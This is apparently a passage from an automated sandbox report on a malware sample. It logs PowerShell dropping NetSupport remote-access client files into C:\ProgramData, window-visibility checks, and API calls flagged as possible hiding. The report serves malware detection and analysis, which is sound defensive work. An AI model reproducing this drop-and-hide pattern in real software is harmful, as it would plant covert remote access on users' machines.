Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB770299 push ds; retf	25_2_00007FF9BB77029F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB7725DF push es; retf	25_2_00007FF9BB7725EF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB7721F7 push ds; retf	25_2_00007FF9BB7721F8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB7731FC push cs; retf	25_2_00007FF9BB7731FD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB771017 push ss; retf	25_2_00007FF9BB771018
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB771625 push ss; retf	25_2_00007FF9BB771626
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB77082E push ds; retf	25_2_00007FF9BB770832
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB772037 push es; retf	25_2_00007FF9BB77203B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB771836 push cs; retf	25_2_00007FF9BB77183A

Source: msvcr100.dll.26.dr

Static PE information: section name: .text entropy: 6.909044922675825

Drops PE files

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\PCICHEK.DLL	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\msvcr100.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\AudioCapture.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\TCCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\remcmdstub.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\client32.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\pcicapi.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\PCICL32.DLL	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\HTCTL32.DLL	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\PCICHEK.DLL	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\msvcr100.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\AudioCapture.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\TCCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\remcmdstub.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\client32.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\pcicapi.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\PCICL32.DLL	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\netsupport\client\HTCTL32.DLL	Jump to dropped file

Source: C:\ProgramData\netsupport\client\client32.exe

32_2_6BEC7030

Stores files to the Windows start menu directory

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\ProgramData\netsupport\client\client32.exe

32_2_11124DC0

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Tries to open files direct via NTFS file id

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: NULL			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: NULL			Jump to behavior

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_111365D0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,	32_2_111365D0
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11157150 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	32_2_11157150
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11157150 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	32_2_11157150
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11025180 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,	32_2_11025180
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11157550 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,	32_2_11157550
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_110255D0 IsIconic,BringWindowToTop,GetCurrentThreadId,	32_2_110255D0
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1110F720 IsIconic,GetTickCount,	32_2_1110F720
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1111F990 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	32_2_1111F990
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1111F990 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	32_2_1111F990
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_110238A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,	32_2_110238A0
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_110BFC50 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,	32_2_110BFC50
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11023F80 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,	32_2_11023F80
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11110340 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,	32_2_11110340
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_110CA260 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	32_2_110CA260
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_110CA260 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	32_2_110CA260

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\ProgramData\netsupport\client\client32.exe

32_2_11029200

Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
